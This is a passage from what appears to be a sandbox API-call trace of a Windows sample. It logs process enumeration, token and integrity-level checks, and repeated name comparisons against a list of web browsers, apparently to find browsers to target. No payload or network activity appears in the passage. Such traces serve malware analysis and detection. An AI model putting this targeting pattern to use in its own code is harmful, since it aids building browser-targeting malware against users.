IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.548] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.548] CloseHandle (hObject=0xb8) returned 1 [0321.548] CloseHandle (hObject=0xb4) returned 1 [0321.549] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0321.549] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0321.549] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0321.549] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0321.549] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0321.549] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0321.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0321.549] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.549] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.549] GetLastError () returned 0x7a [0321.550] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.550] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.550] CloseHandle (hObject=0xb8) returned 1 [0321.550] CloseHandle (hObject=0xb4) returned 1 [0321.550] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0321.550] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96fe0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.550] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.550] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.551] GetLastError () returned 0x7a [0321.551] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.551] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.551] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.551] CloseHandle (hObject=0xb8) returned 1 [0321.551] CloseHandle (hObject=0xb4) returned 1 [0321.552] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0321.552] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0321.552] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0321.552] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0321.552] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0321.552] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0321.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0321.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0321.552] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.553] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.553] GetLastError () returned 0x7a [0321.553] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.553] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.553] CloseHandle (hObject=0xb8) returned 1 [0321.553] CloseHandle (hObject=0xb4) returned 1 [0321.553] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0321.554] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x978e8, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.554] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.554] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.554] GetLastError () returned 0x7a [0321.554] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.554] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.554] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.554] CloseHandle (hObject=0xb8) returned 1 [0321.554] CloseHandle (hObject=0xb4) returned 1 [0321.555] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.555] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.555] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0321.555] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.555] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.555] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0321.556] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.556] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.556] GetLastError () returned 0x7a [0321.573] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.573] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.573] CloseHandle (hObject=0xb8) returned 1 [0321.573] CloseHandle (hObject=0xb4) returned 1 [0321.573] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0321.573] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97c90, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.573] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.573] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.573] GetLastError () returned 0x7a [0321.574] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.574] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.574] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.574] CloseHandle (hObject=0xb8) returned 1 [0321.574] CloseHandle (hObject=0xb4) returned 1 [0321.574] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0321.574] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0321.574] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0321.574] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0321.575] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0321.575] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0321.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0321.575] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.575] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.575] GetLastError () returned 0x7a [0321.575] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.575] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.575] CloseHandle (hObject=0xb8) returned 1 [0321.575] CloseHandle (hObject=0xb4) returned 1 [0321.575] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0321.575] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97e28, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.575] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.576] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.576] GetLastError () returned 0x7a [0321.576] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.576] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.576] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.576] CloseHandle (hObject=0xb8) returned 1 [0321.576] CloseHandle (hObject=0xb4) returned 1 [0321.576] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0321.577] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0321.577] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0321.577] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0321.577] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0321.577] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0321.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0321.577] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.577] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.577] GetLastError () returned 0x7a [0321.577] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.577] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.577] CloseHandle (hObject=0xb8) returned 1 [0321.577] CloseHandle (hObject=0xb4) returned 1 [0321.577] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0321.577] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x98340, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.578] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.578] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.578] GetLastError () returned 0x7a [0321.578] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.578] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.578] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.578] CloseHandle (hObject=0xb8) returned 1 [0321.578] CloseHandle (hObject=0xb4) returned 1 [0321.578] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0321.578] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0321.578] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0321.578] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0321.578] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0321.579] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0321.579] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.579] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0323.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xafa0) returned 0xc0000004 [0323.629] VirtualAlloc (lpAddress=0x0, dwSize=0xbfa0, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0323.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbfa0, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0323.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0323.630] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.630] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.631] GetLastError () returned 0x7a [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.631] CloseHandle (hObject=0xb8) returned 1 [0323.631] CloseHandle (hObject=0xb4) returned 1 [0323.631] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0323.631] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x98720, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.631] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.631] GetLastError () returned 0x7a [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.631] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.631] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.631] CloseHandle (hObject=0xb8) returned 1 [0323.631] CloseHandle (hObject=0xb4) returned 1 [0323.631] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0323.631] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0323.631] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0323.631] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0323.631] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0323.631] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0323.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0323.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0323.631] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.631] GetLastError () returned 0x7a [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.631] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.631] CloseHandle (hObject=0xb8) returned 1 [0323.632] CloseHandle (hObject=0xb4) returned 1 [0323.632] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0323.632] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96960, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: 